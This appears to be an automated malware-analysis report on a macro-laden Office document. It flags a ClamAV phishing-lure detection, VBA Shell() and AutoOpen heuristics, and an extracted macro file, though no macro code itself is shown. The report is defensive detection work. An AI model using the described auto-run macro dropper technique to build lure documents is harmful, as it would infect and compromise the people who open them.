Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file is a malicious OLE document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, which is used to execute commands. This strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports dropper or phishing-lure functionality.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 77624 bytes |

SHA-256 of macros.bas: 59ecadb0c63ee8445184254d084813d6b43a460f59dffa6e29c8dc0abc0ff430
Preview script: first 1,000 lines of the extracted script.